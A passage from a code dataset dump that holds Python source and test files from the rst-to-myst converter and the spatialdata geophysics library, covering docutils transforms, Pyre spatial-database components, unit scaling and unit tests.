Similar to ``docutils.transforms.frontmatter.DocInfo``.
"""
def apply(self):
if not self.document.settings.front_matter:
return
index = self.document.first_child_not_matching_class(nodes.PreBibliographic)
if index is None:
return
candidate = self.document[index]
if isinstance(candidate, nodes.section):
index = candidate.first_child_not_matching_class(nodes.PreBibliographic)
if index is None:
return
candidate = candidate[index]
if isinstance(candidate, nodes.field_list):
front_matter = FrontMatterNode("", *candidate.children)
candidate.replace_self(front_matter)
def to_docutils_ast(
text: str,
uri: str = "source",
report_level=2,
halt_level=4,
warning_stream=None,
language_code="en",
use_sphinx=True,
extensions=(),
default_domain="py",
conversions=None,
front_matter=True,
) -> Tuple[nodes.document, StringIO]:
settings = OptionParser(components=(LosslessRSTParser,)).get_default_values()
warning_stream = StringIO() if warning_stream is None else warning_stream
settings.warning_stream = warning_stream
settings.report_level = report_level # 2=warning
settings.halt_level = halt_level # 4=severe
# The level at or above which `SystemMessage` exceptions
# will be raised, halting execution.
settings.language_code = language_code
document = new_document(uri, settings=settings)
# compile lookup for directives/roles
namespace = compile_namespace(
language_code=language_code,
use_sphinx=use_sphinx,
extensions=extensions,
default_domain=default_domain,
)
document.settings.namespace = namespace
# get conversion lookup for directives
directive_data = yaml.safe_load(
files(package_data).joinpath("directives.yml").read_text("utf8")
)
if conversions:
directive_data.update(conversions)
document.settings.directive_data = directive_data
# whether to treat initial field list as front matter
document.settings.front_matter = front_matter
parser = LosslessRSTParser()
parser.parse(text, document)
# these three transforms are required for converting targets correctly
for transform_cls in [
PropagateTargets, # Propagate empty internal targets to the next element. (260)
FrontMatter, # convert initial field list (DocInfo=340)
AnonymousHyperlinks, # Link anonymous references to targets. (440)
# IndirectHyperlinks, # "refuri" migrated back to all indirect targets (460)
Footnotes, # Assign numbers to autonumbered footnotes (620)
# bespoke transforms
StripFootnoteLabel,
ResolveListItems,
]:
transform = transform_cls(document)
transform.apply()
return document, warning_stream
```
#### File: rst-to-myst/rst_to_myst/utils.py
```python
from pathlib import Path
import yaml
def read_fixture_file(path):
text = Path(path).read_text(encoding="utf-8")
tests = []
section = 0
last_pos = 0
lines = text.splitlines(keepends=True)
for i in range(len(lines)):
if lines[i].rstrip() == ".":
if section == 0:
tests.append([i, lines[i - 1].strip()])
section = 1
elif section == 1:
tests[-1].append("".join(lines[last_pos + 1 : i]))
section = 2
elif section == 2:
tests[-1].append("".join(lines[last_pos + 1 : i]))
section = 0
last_pos = i
return tests
def represent_str(dumper, data):
# borrowed from http://stackoverflow.com/a/33300001
if len(data.splitlines()) > 1:
return dumper.represent_scalar("tag:yaml.org,2002:str", data, style="|")
return dumper.represent_scalar("tag:yaml.org,2002:str", data)
class YamlDumper(yaml.SafeDumper):
pass
YamlDumper.add_representer(str, represent_str)
def yaml_dump(data, sort_keys: bool = True):
return yaml.dump(data, Dumper=YamlDumper, sort_keys=sort_keys)
```
#### File: rst-to-myst/tests/test_cli.py
```python
from pathlib import Path
from click.testing import CliRunner
from rst_to_myst import cli
def test_directives_list():
runner = CliRunner()
result = runner.invoke(cli.directives_list, [])
assert result.exit_code == 0, result.output
assert "admonition" in result.output
def test_roles_list():
runner = CliRunner()
result = runner.invoke(cli.roles_list, [])
assert result.exit_code == 0
assert "acronym" in result.output
def test_directives_show():
runner = CliRunner()
result = runner.invoke(cli.directives_show, ["admonition"])
assert result.exit_code == 0
assert "directives.admonitions.Admonition" in result.output
def test_directives_show_translate():
runner = CliRunner()
result = runner.invoke(cli.directives_show, ["-l", "fr", "astuce"])
assert result.exit_code == 0
assert "directives.admonitions.Tip" in result.output
def test_roles_show():
runner = CliRunner()
result = runner.invoke(cli.roles_show, ["acronym"])
assert result.exit_code == 0
assert "rst.roles" in result.output
def test_ast():
runner = CliRunner()
result = runner.invoke(cli.ast, ["-"], input=":name:`content`")
assert result.exit_code == 0, result.output
assert '<RoleNode role="name" text="content">' in result.output
def test_tokens():
runner = CliRunner()
result = runner.invoke(cli.tokens, ["-"], input=":name:`content`")
assert result.exit_code == 0, result.output
assert "paragraph_open" in result.output
def test_stream():
runner = CliRunner()
result = runner.invoke(cli.stream, ["-"], input=":name:`content`")
assert result.exit_code == 0, result.output
assert "{name}`content`" in result.output
def test_convert(tmp_path: Path, file_regression):
tmp_path.joinpath("test.rst").write_text(
"head\n====\n\ncontent `a`\n", encoding="utf8"
)
tmp_path.joinpath("config.yaml").write_text("default_role: math\n", encoding="utf8")
runner = CliRunner()
result = runner.invoke(
cli.convert,
[
"--config",
str(tmp_path.joinpath("config.yaml")),
str(tmp_path.joinpath("test.rst")),
],
)
assert result.exit_code == 0, result.output
assert tmp_path.joinpath("test.md").exists()
file_regression.check(
tmp_path.joinpath("test.md").read_text(encoding="utf8"),
encoding="utf8",
extension=".md",
)
```
#### File: rst-to-myst/tests/test_fixtures.py
```python
from pathlib import Path
import pytest
from rst_to_myst import rst_to_myst, to_docutils_ast
from rst_to_myst.utils import read_fixture_file
FIXTURE_PATH = Path(__file__).parent.joinpath("fixtures")
@pytest.mark.parametrize(
"line,title,rst,expected",
read_fixture_file(FIXTURE_PATH / "ast.txt"),
ids=[f"{i[0]}-{i[1]}" for i in read_fixture_file(FIXTURE_PATH / "ast.txt")],
)
def test_ast(line, title, rst, expected):
document, warning_stream = to_docutils_ast(rst)
text = document.pformat()
try:
assert warning_stream.getvalue() == ""
assert text.rstrip() == expected.rstrip()
except AssertionError:
print(text)
raise
@pytest.mark.parametrize(
"line,title,rst,expected",
read_fixture_file(FIXTURE_PATH / "render.txt"),
ids=[f"{i[0]}-{i[1]}" for i in read_fixture_file(FIXTURE_PATH / "render.txt")],
)
def test_render(line, title, rst, expected):
output = rst_to_myst(rst)
try:
assert output.warning_stream.getvalue() == ""
assert output.text.rstrip() == expected.rstrip()
except AssertionError:
print(output.text)
raise
@pytest.mark.parametrize(
"line,title,rst,expected",
read_fixture_file(FIXTURE_PATH / "render_extra.txt"),
ids=[
f"{i[0]}-{i[1]}" for i in read_fixture_file(FIXTURE_PATH / "render_extra.txt")
],
)
def test_render_extra(line, title, rst, expected):
output = rst_to_myst(rst)
try:
assert output.warning_stream.getvalue() == ""
assert output.text.rstrip() == expected.rstrip()
except AssertionError:
print(output.text)
raise
```
|
{
"source": "jedbrown/spatialdata",
"score": 3
}
|
#### File: spatialdata/geocoords/CoordSys.py
```python
from pyre.components.Component import Component
# CoordSys class
class CoordSys(Component):
"""
Python manager for coordinate systems.
Factory: coordsys
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(Component.Inventory):
"""Python object for managing CoordSys facilities and properties."""
## @class Inventory
## Python object for managing CoordSys facilities and properties.
##
## \b Properties
## @li None
##
## \b Facilities
## @li None
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="coordsys"):
"""
Constructor.
"""
Component.__init__(self, name, facility="coordsys")
self._createModuleObj()
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Setup members using inventory.
"""
Component._configure(self)
return
def _createModuleObj(self):
"""
Create Python module object.
"""
raise NotImplementedError("_createModuleObj() not implemented.")
return
# FACTORIES ////////////////////////////////////////////////////////////
def coordsys():
"""
Factory associated with CoordSys.
"""
return CoordSys()
# End of file
```
#### File: spatialdata/spatialdb/CompositeDB.py
```python
from SpatialDBObj import SpatialDBObj
from spatialdb import CompositeDB as ModuleCompositeDB
# CompositeDB class
class CompositeDB(SpatialDBObj, ModuleCompositeDB):
"""
Python manager for spatial database with uniform values.
Factory: spatial_database
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(SpatialDBObj.Inventory):
"""
Python object for managing CompositeDB facilities and properties.
"""
## @class Inventory
## Python object for managing CompositeDB facilities and properties.
##
## \b Properties
## @li \b values_A Names of values to query with database A
## @li \b values_B Names of values to query with database B
##
## \b Facilities
## @li \b db_A Spatial database A
## @li \b db_B Spatial database B
import pyre.inventory
namesA = pyre.inventory.list("values_A", default=[])
namesA.meta['tip'] = "Names of values to query with database A."
namesB = pyre.inventory.list("values_B", default=[])
namesB.meta['tip'] = "Names of values to query with database B."
from UniformDB import UniformDB
dbA = pyre.inventory.facility("db_A", factory=UniformDB,
family="spatial_database")
dbA.meta['tip'] = "Spatial database A."
dbB = pyre.inventory.facility("db_B", factory=UniformDB,
family="spatial_database")
dbB.meta['tip'] = "Spatial database B."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="compositedb"):
"""
Constructor.
"""
SpatialDBObj.__init__(self, name)
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Set members based on inventory.
"""
SpatialDBObj._configure(self)
self._validateParameters(self.inventory)
self.dbA(self.inventory.dbA, self.inventory.namesA)
self.dbB(self.inventory.dbB, self.inventory.namesB)
return
def _createModuleObj(self):
"""
Create Python module object.
"""
ModuleCompositeDB.__init__(self)
return
def _validateParameters(self, data):
"""
Validate parameters.
"""
if (0 == len(data.namesA)):
raise ValueError, \
"Error in spatial database '%s'\n" \
"Names of values to query in database A not set." \
% self.label
if (0 == len(data.namesB)):
raise ValueError, \
"Error in spatial database '%s'\n" \
"Names of values to query in database B not set." \
% self.label
return
# FACTORIES ////////////////////////////////////////////////////////////
def spatial_database():
"""
Factory associated with CompositeDB.
"""
return CompositeDB()
# End of file
```
#### File: spatialdb/generator/Geometry.py
```python
from pyre.components.Component import Component
# Dummy class for empty component
class Dummy(Component):
def __init__(self):
Component.__init__(self, name="dummy", facility="dummy")
return
# Geometry class
class Geometry(Component):
"""
Python manager for geometry used in generating database.
Factory: geometry.
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(Component.Inventory):
"""
Python object for managing Geometry facilities and properties.
"""
## @class Inventory
## Python object for managing Geometry facilities and properties.
##
## \b Properties
## @li \b data_dim Spatial dimension of database locations.
##
## \b Facilities
## @li \b reader Object to read geometry
## @li \b coordsys Coordinate system of geometry
import pyre.inventory
dataDim = pyre.inventory.int("data_dim", default=2)
dataDim.validator = pyre.inventory.choice([0, 1, 2, 3])
dataDim.meta['tip'] = "Spatial dimension of database locations."
reader = pyre.inventory.facility("reader", family="reader",
factory=Dummy)
reader.meta['tip'] = "Object to read geometry."
from spatialdata.geocoords.CSCart import CSCart
coordsys = pyre.inventory.facility("coordsys", family="coordsys",
factory=CSCart)
coordsys.meta['tip'] = "Coordinate system for database."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="geometry"):
"""
Constructor.
"""
Component.__init__(self, name, facility="geometry")
self.vertices = None
return
def read(self):
"""
Read geometry.
"""
self.vertices = self.reader.read()
self.coordsys.initialize()
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Setup members using inventory.
"""
Component._configure(self)
self.dataDim = self.inventory.dataDim
self.reader = self.inventory.reader
self.coordsys = self.inventory.coordsys
return
# FACTORIES ////////////////////////////////////////////////////////////
def geometry():
"""
Factory associated with Geometry.
"""
return Geometry()
# End of file
```
#### File: spatialdata/spatialdb/SCECCVMH.py
```python
from SpatialDBObj import SpatialDBObj
from spatialdb import SCECCVMH as ModuleSCECCVMH
# SCECCVMH class
class SCECCVMH(SpatialDBObj, ModuleSCECCVMH):
"""
Python manager for spatial database to the SCEC CVM-H.
Factory: spatial_database
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(SpatialDBObj.Inventory):
"""
Python object for managing SCECCVMH facilities and properties.
"""
## @class Inventory
## Python object for managing SCECCVMH facilities and properties.
##
## \b Properties
## @li \b data_dir Directory containing SCEC CVM-H data files.
## @li \b min_vs Minimum shear wave speed.
## @li \b squash Squash topography/bathymetry to sea level.
## @li \b squash_limit Elevation above which topography is squashed.
##
## \b Facilities
## @li none
import pyre.inventory
dataDir = pyre.inventory.str("data_dir", default=".")
dataDir.meta['tip'] = "Directory containing SCEC CVM-H data files."
from pyre.units.length import meter
from pyre.units.time import second
minVs = pyre.inventory.dimensional("min_vs", default=500.0*meter/second)
minVs.meta['tip'] = "Minimum shear wave speed."
squash = pyre.inventory.bool("squash", default=False)
squash.meta['tip'] = "Squash topography/bathymetry to sea level."
from pyre.units.length import km
squashLimit = pyre.inventory.dimensional("squash_limit",
default=-2.0*km)
squashLimit.meta['tip'] = "Elevation above which topography is squashed."
label = pyre.inventory.str("label", default="SCEC CVM-H")
label.meta['tip'] = "Descriptive label for seismic velocity model."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="sceccvmh"):
"""
Constructor.
"""
SpatialDBObj.__init__(self, name)
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Set members based on inventory.
"""
SpatialDBObj._configure(self)
self.label("SCEC CVM-H")
self.dataDir(self.inventory.dataDir)
self.minVs(self.inventory.minVs.value)
self.squash(self.inventory.squash, self.inventory.squashLimit.value)
return
def _createModuleObj(self):
"""
Create Python module object.
"""
ModuleSCECCVMH.__init__(self)
return
# FACTORIES ////////////////////////////////////////////////////////////
def spatial_database():
"""
Factory associated with SCECCVMH.
"""
return SCECCVMH()
# End of file
```
#### File: spatialdata/spatialdb/SimpleDB.py
```python
from SpatialDBObj import SpatialDBObj
from spatialdb import SimpleDB as ModuleSimpleDB
# SimpleDB class
class SimpleDB(SpatialDBObj, ModuleSimpleDB):
"""
Python manager for simple spatial database.
Factory: spatial_database
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(SpatialDBObj.Inventory):
"""
Python object for managing SimpleDB facilities and properties.
"""
## @class Inventory
## Python object for managing SimpleDB facilities and properties.
##
## \b Properties
## @li query-type Type of query to perform
##
## \b Facilities
## @li \b iohandler I/O handler for database
import pyre.inventory
queryType = pyre.inventory.str("query_type", default="nearest")
queryType.validator = pyre.inventory.choice(["nearest", "linear"])
queryType.meta['tip'] = "Type of query to perform."
from SimpleIOAscii import SimpleIOAscii
iohandler = pyre.inventory.facility("iohandler", family="simpledb_io",
factory=SimpleIOAscii)
iohandler.meta['tip'] = "I/O handler for database."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="simpledb"):
"""
Constructor.
"""
SpatialDBObj.__init__(self, name)
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Set members based on inventory.
"""
SpatialDBObj._configure(self)
self.ioHandler(self.inventory.iohandler)
self.queryType(self._parseQueryString(self.inventory.queryType))
return
def _createModuleObj(self):
"""
Create Python module object.
"""
ModuleSimpleDB.__init__(self)
return
def _parseQueryString(self, label):
if label.lower() == "nearest":
value = ModuleSimpleDB.NEAREST
elif label.lower() == "linear":
value = ModuleSimpleDB.LINEAR
else:
raise ValueError("Unknown value for query type '%s'." % label)
return value
# FACTORIES ////////////////////////////////////////////////////////////
def spatial_database():
"""
Factory associated with SimpleDB.
"""
return SimpleDB()
# End of file
```
#### File: spatialdata/spatialdb/SimpleIO.py
```python
from pyre.components.Component import Component
# Validator for filename
def validateFilename(value):
"""
Validate filename.
"""
if 0 == len(value):
raise ValueError("Filename for spatial database not specified.")
return value
# SimpleIO class
class SimpleIO(Component):
"""
Python I/O manager for simple database (SimpleDB).
Factory: simpledb_io
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(Component.Inventory):
"""
Python object for managing SimpleIO facilities and properties.
"""
## @class Inventory
## Python object for managing SimpleIO facilities and properties.
##
## \b Properties
## @li \b filename Name of database file
##
## \b Facilities
## @li None
import pyre.inventory
filename = pyre.inventory.str("filename", default="",
validator=validateFilename)
filename.meta['tip'] = "Name of database file."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="simpleio"):
"""
Constructor.
"""
Component.__init__(self, name, facility="simpledb_io")
self._createModuleObj()
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Set members using inventory.
"""
try:
Component._configure(self)
self.filename(self.inventory.filename)
except ValueError, err:
aliases = ", ".join(self.aliases)
raise ValueError("Error while configuring spatial database reader "
"(%s):\n%s" % (aliases, err.message))
return
def _createModuleObj(self):
"""
Create Python module object.
"""
raise NotImplementedError("_createModuleObj() not implemented.")
return
def _validateData(self, data):
"""
Check consistency of database data.
"""
(numLocs, spaceDim) = data['points'].shape
cs = data['coordsys']
if spaceDim != cs.spaceDim():
raise ValueError("Simple database '%s' space-dim (%d) does not agree with spatial "\
"dimension of coordinate system (%d)." % \
(self.label, spaceDim, cs.spaceDim()))
return
# FACTORIES ////////////////////////////////////////////////////////////
def simpledb_io():
"""
Factory associated with SimpleIO.
"""
return SimpleIO()
# End of file
```
#### File: spatialdata/spatialdb/TimeHistory.py
```python
from pyre.components.Component import Component
from spatialdb import TimeHistory as ModuleTimeHistory
# TimeHistory class
class TimeHistory(Component, ModuleTimeHistory):
"""
Python object for time history dependence with spatial databases.
\b Properties
@li \b label Label for time history.
@li \b filename Name of file for time history.
\b Facilities
@li None
Factory: temporal_database
"""
import pyre.inventory
label = pyre.inventory.str("label", default="temporal database")
label.meta['tip'] = "Label for time history."
filename = pyre.inventory.str("filename", default="timehistory.timedb")
filename.meta['tip'] = "Name of file for time history."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="timehistory"):
"""
Constructor.
"""
Component.__init__(self, name, facility="temporal_database")
self._createModuleObj()
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Set attributes based on inventory.
"""
Component._configure(self)
ModuleTimeHistory.label(self, self.inventory.label)
ModuleTimeHistory.filename(self, self.inventory.filename)
return
def _createModuleObj(self):
"""
Create Python module object.
"""
ModuleTimeHistory.__init__(self)
return
# FACTORIES ////////////////////////////////////////////////////////////
def temporal_database():
"""
Factory associated with TimeHistory.
"""
return TimeHistory()
# End of file
```
#### File: spatialdata/units/NondimElasticQuasistatic.py
```python
from Nondimensional import Nondimensional
# NondimElasticQuasistatic class
class NondimElasticQuasistatic(Nondimensional):
"""
Python manager for nondimensionalizing quasi-static elasticity problems.
Factory: nondimensional
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(Nondimensional.Inventory):
"""
Python object for managing NondimElasticQuasistatic facilities and
properties.
"""
# @class Inventory
# Python object for managing NondimElasticQuasistatic facilities and
# properties.
##
# \b Properties
# @li \b shear_modulus Shear modulus to nondimensionalize pressure.
# @li \b length_scale Value to nondimensionalize length scale.
# @li \b relaxation_time Relaxation time to nondimensionalize time.
##
# \b Facilities
# @li None
import pyre.inventory
from pyre.units.length import meter
lengthScale = pyre.inventory.dimensional("length_scale", default=1.0e+3 * meter,
validator=pyre.inventory.greater(0.0 * meter))
lengthScale.meta['tip'] = "Value to nondimensionalize length scale."
from pyre.units.pressure import pascal
shearModulus = pyre.inventory.dimensional("shear_modulus", default=3.0e+10 * pascal,
validator=pyre.inventory.greater(0.0 * pascal))
shearModulus.meta['tip'] = "Shear modulus to nondimensionalize pressure."
from pyre.units.time import year
relaxationTime = pyre.inventory.dimensional("relaxation_time", default=100.0 * year,
validator=pyre.inventory.greater(0.0 * year))
relaxationTime.meta['tip'] = "Relaxation time to nondimensionalize time."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="nondimelasticquasistatic"):
"""
Constructor.
"""
Nondimensional.__init__(self, name)
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Setup members using inventory.
"""
Nondimensional._configure(self)
self.setLengthScale(self.inventory.lengthScale)
self.setPressureScale(self.inventory.shearModulus)
self.setTimeScale(self.inventory.relaxationTime)
self.computeDensityScale()
return
# FACTORIES ////////////////////////////////////////////////////////////
def nondimensional():
"""
Factory associated with NondimElasticQuasistatic.
"""
return NondimElasticQuasistatic()
# End of file
```
#### File: spatialdb/tests/testcontrib.py
```python
import unittest
def suite():
suite = unittest.TestSuite()
from TestUniformVelModel import TestUniformVelModel
suite.addTest(unittest.makeSuite(TestUniformVelModel))
return suite
def main():
unittest.TextTestRunner(verbosity=2).run(suite())
return
if __name__ == '__main__':
main()
# End of file
```
#### File: templates/spatialdb/UniformVelModel.py
```python
from spatialdata.spatialdb.SpatialDBObj import SpatialDBObj
from spatialdbcontrib import UniformVelModel as ModuleUniformVelModel
# UniformVelModel class
class UniformVelModel(SpatialDBObj, ModuleUniformVelModel):
"""
Python object associated with the C++ UniformVelModel object. This
objects provides a Pyre interface to the C++ object. It inherits
from the generic SpatialDBObj and the UniformVelModel SWIG module
object. This insures that this object has all of the SpatialDBObj
Pyre properties and facilities and functions and calls to the
underlying C++ code are passed onto the SWIG Python module.
Factory: spatial_database
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(SpatialDBObj.Inventory):
"""
Python object for managing UniformVelModel Pyre facilities and properties.
## \b Properties
## @li \b vs S wave speed.
## @li \b vp P wave speed.
## @li \b density Density.
##
## \b Facilities
## @li none
"""
import pyre.inventory
# Units used in properties
from pyre.units.time import s
from pyre.units.length import km,m
from pyre.units.mass import kg
# Pyre properties have the form
#
# VARIABLE = pyre.inventory.TYPE("CFG_NAME", default=DEFAULT_VALUE)
# VARIABLE.meta['tip'] = "HELP STRING"
#
# where VARIABLE is a variable used to refer to the Pyre property,
# TYPE of the type of property (dimensional, str, float, int,
# etc), CFG_NAME is the name used in the Pyre .cfg files and the
# command line, and DEFAULT_VALUE is the default value.
#
# When a Pyre property is a dimensional scalar quantity, use the
# dimensional type for properties and Pyre will automatically
# check to make sure user-specified quantities have compatible
# units and convert the value to SI units.
#
# The help string will be printed when the user uses the command
# line arugments --FULL_COMPONENT_NAME.help-properties or
# --FULL_COMPONENT.help-components. See the PyLith manual chapter
# "Running PyLith" for more information regarding getting help
# using command line arguments.
#
# Create a Pyre property named vs with a default value of 2.6 km/s.
vs = pyre.inventory.dimensional("vs", default=2.6*km/s)
vs.meta['tip'] = "S wave speed."
# Create a Pyre property named vp with a default value of 4.5 km/s.
vp = pyre.inventory.dimensional("vp", default=4.5*km/s)
vp.meta['tip'] = "P wave speed."
# Create a Pyre property named density with a default value of 2500 kg/m**3.
density = pyre.inventory.dimensional("density", default=2.5e+3*kg/m**3)
density.meta['tip'] = "Density."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="uniformvelmodel"):
"""
Constructor. This function is called automatically when the Python
UniformVelModel object is created.
"""
SpatialDBObj.__init__(self, name)
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Set members based on inventory. This function is called
automatically when the component is setup.
"""
SpatialDBObj._configure(self) # Call parent function.
# Transfer inventory to C++ object
ModuleUniformVelModel.vs(self, self.inventory.vs.value)
ModuleUniformVelModel.vp(self, self.inventory.vp.value)
ModuleUniformVelModel.density(self, self.inventory.density.value)
return
def _createModuleObj(self):
"""
Create handle to C++ object. This function is called by the
generic SpatialDBObj constructor. The name cannot be changed and
no arguments can be added.
"""
# Create the SWIG module object to provide access to the C++ object.
ModuleUniformVelModel.__init__(self)
return
# FACTORIES ////////////////////////////////////////////////////////////
# Factory used when setting UniformVelModel to a Pyre 'spatial_database' facility.
def spatial_database():
"""
Factory associated with UniformVelModel.
"""
return UniformVelModel()
# End of file
```
#### File: geocoords/data/ConvertDataApp.py
```python
from pyre.applications.Script import Script
# ConvertDataApp class
class ConvertDataApp(Script):
"""Python application to generate data for coordinate conversion tests."""
def main(self, *args, **kwds):
"""Run application."""
data = self.inventory.data
data.calculate()
data.dump(self.inventory.dumper)
return
def __init__(self):
"""Constructor."""
Script.__init__(self, 'convertdataapp')
return
class Inventory(Script.Inventory):
## @class Inventory
## Python object for managing ConvertDataApp facilities and properties.
##
## \b Properties
## @li None
##
## \b Facilities
## @li \b data Data generator for coordinate transformation test
## @li \b dumper Dump data to file
import pyre.inventory
from spatialdata.utils.CppData import CppData
from ConvertData import ConvertData
data = pyre.inventory.facility('data', factory=ConvertData)
dumper = pyre.inventory.facility('dumper', factory=CppData)
# main
if __name__ == '__main__':
app = ConvertDataApp()
app.run()
# End of file
```
#### File: spatialdb/data/SimpleDBTestDataLine3D.py
```python
import numpy
from SimpleDBApp import SimpleDBApp
# SimpleDBDataLine3D class
class SimpleDBDataLine3D(SimpleDBApp):
"""
Python data generator for tests of C++ SimpleDB using
data with linear 3-D spatial distribution.
"""
def _compute(self):
"""
Compute query data.
"""
# Database information
self.numLocs = 5
self.numVals = 2
self.spaceDim = 3
self.names = [ "One", "Two" ]
self.units = [ "m", "m" ]
self.dataDim = 1
self.dbCoords = None
self.dbData = None
# Query information
self.numQueries = 4
self.queryNearest = numpy.array( [[4.5, 2.3, 4.0, 6.3, 7.4],
[3.2, 7.4, 5.8, 6.3, 7.4],
[4.0, 9.8, 5.7, 6.3, 7.4]],
dtype=numpy.float64)
self.queryLinear = numpy.array( [[2.9, 3.4, 8.7, 6.3, 7.4],
[2.2, 9.0, 8.5, 6.3, 7.4],
[0.2, 5.8, 6.6, 6.3, 7.4]],
dtype=numpy.float64)
self.errFlags = numpy.array( [ 0, 0, 1, 0 ], dtype=numpy.int32)
tdata = [ {'t': 0.0, 'one': 0.1, 'two': 1.1},
{'t': 1.0, 'one': 0.3, 'two': 3.3},
{'t': 1.5, 'one': 0.2, 'two': 2.2},
{'t': 2.0, 'one': 0.1, 'two': 1.1},
{'t': 5.0, 'one': -0.4, 'two': -4.4} ]
qtdata = [ {'t': 1.0, 'ni': 1, 'wts': [{'i': 1, 'w': 1.0}] },
{'t': 4.0, 'ni': 4, 'wts': [{'i': 3, 'w': 1.0/3.0},
{'i': 4, 'w': 2.0/3.0} ] },
{'t': 6.0, 'ni': 4, 'wts': [{'i': 3, 'w': 0.0},
{'i': 4, 'w': 0.0} ] },
{'t': 1.2, 'ni': 1, 'wts': [{'i': 1, 'w': 0.6},
{'i': 2, 'w': 0.4}]} ]
o = numpy.array([3.4, 9.5, 8.7], dtype=numpy.float64)
a = numpy.array([2.3, 0.4, 9.8], dtype=numpy.float64)
self.dbCoords = numpy.zeros( (self.numLocs, self.spaceDim),
dtype=numpy.float64)
self.dbData = numpy.zeros( (self.numLocs, self.numVals),
dtype=numpy.float64)
iLoc = 0
for loc in tdata:
xyz = o + a*loc['t']
self.dbCoords[iLoc, :] = numpy.array([xyz[0], xyz[1], xyz[2]],
dtype=numpy.float64)
self.dbData[iLoc, :] = numpy.array([loc['one'], loc['two']],
dtype=numpy.float64)
iLoc += 1
self.queryNearest = numpy.zeros( (self.numQueries,
self.spaceDim+self.numVals),
dtype=numpy.float64)
self.queryLinear = numpy.zeros( (self.numQueries,
self.spaceDim+self.numVals),
dtype=numpy.float64)
iLoc = 0
for qloc in qtdata:
xyz = o + a*qloc['t']
v1 = 0
v2 = 0
for wt in qloc['wts']:
v1 += tdata[wt['i']]['one']*wt['w']
v2 += tdata[wt['i']]['two']*wt['w']
self.queryLinear[iLoc,:] = numpy.array([xyz[0], xyz[1], xyz[2], v1, v2],
dtype=numpy.float64)
v1 = tdata[qloc['ni']]['one']
v2 = tdata[qloc['ni']]['two']
self.queryNearest[iLoc,:] = numpy.array([xyz[0], xyz[1], xyz[2], v1, v2],
dtype=numpy.float64)
iLoc += 1
return
def __init__(self):
"""
Constructor.
"""
SimpleDBApp.__init__(self, name="simpledbdataline3D")
return
# MAIN /////////////////////////////////////////////////////////////////
if __name__ == "__main__":
app = SimpleDBDataLine3D()
app.run()
# End of file
```
#### File: pytests/spatialdb/TestTimeHistory.py
```python
import unittest
import numpy
class TestTimeHistory(unittest.TestCase):
def test_timehistory(self):
timeQ = numpy.array( [0.5, 0.0, 0.6, 2.0, 5.0, 20.0, 8.0 ], dtype=numpy.float64)
amplitudeE = numpy.array( [1.0, 0.0, 1.2, 4.0, 2.5, 0.0, 1.0 ],
dtype=numpy.float64)
errE = numpy.array( [ 0, 0, 0, 0, 0, 1, 0 ], dtype=numpy.float64)
from spatialdata.spatialdb.TimeHistory import TimeHistory
th = TimeHistory()
th.inventory.label = "test"
th.inventory.filename = "data/timehistory.timedb"
th._configure()
th.open()
nlocs = timeQ.shape[0]
amplitude = numpy.zeros( (nlocs,), dtype=numpy.float64)
err = numpy.zeros( (nlocs,), dtype=numpy.int32)
for i in xrange(nlocs):
(e, amplitude[i]) = th.query(timeQ[i])
err[i] = e
th.close()
self.assertEqual(len(errE), len(err))
for vE, v in zip(errE, err):
self.assertEqual(vE, v)
self.assertEqual(len(amplitudeE.shape), len(amplitude.shape))
for dE, d in zip(amplitudeE.shape, amplitude.shape):
self.assertEqual(dE, d)
for vE, v in zip(numpy.reshape(amplitudeE, -1), numpy.reshape(amplitude, -1)):
self.assertAlmostEqual(vE, v, 6)
return
# End of file
```
#### File: pytests/units/TestNondimensional.py
```python
import unittest
from spatialdata.units.Nondimensional import Nondimensional
from pyre.units.length import meter
from pyre.units.pressure import pascal
from pyre.units.time import second
from pyre.units.mass import kilogram
from pyre.units.temperature import kelvin
class TestNondimensional(unittest.TestCase):
def test_constructor(self):
dim = Nondimensional()
dim._configure()
self.assertEqual(1.0*meter, dim.lengthScale())
self.assertEqual(1.0*pascal, dim.pressureScale())
self.assertEqual(1.0*second, dim.timeScale())
self.assertEqual(1.0*kilogram/meter**3, dim.densityScale())
self.assertEqual(1.0*kelvin, dim.temperatureScale())
return
def test_lengthScale(self):
dim = Nondimensional()
dim._configure()
dim.setLengthScale(2.0*meter)
self.assertEqual(2.0*meter, dim.lengthScale())
self.assertEqual(1.0*pascal, dim.pressureScale())
self.assertEqual(1.0*second, dim.timeScale())
self.assertEqual(1.0*kilogram/meter**3, dim.densityScale())
return
def test_pressureScale(self):
dim = Nondimensional()
dim._configure()
dim.setPressureScale(2.0*pascal)
self.assertEqual(1.0*meter, dim.lengthScale())
self.assertEqual(2.0*pascal, dim.pressureScale())
self.assertEqual(1.0*second, dim.timeScale())
self.assertEqual(1.0*kilogram/meter**3, dim.densityScale())
return
def test_timeScale(self):
dim = Nondimensional()
dim._configure()
dim.setTimeScale(2.0*second)
self.assertEqual(1.0*meter, dim.lengthScale())
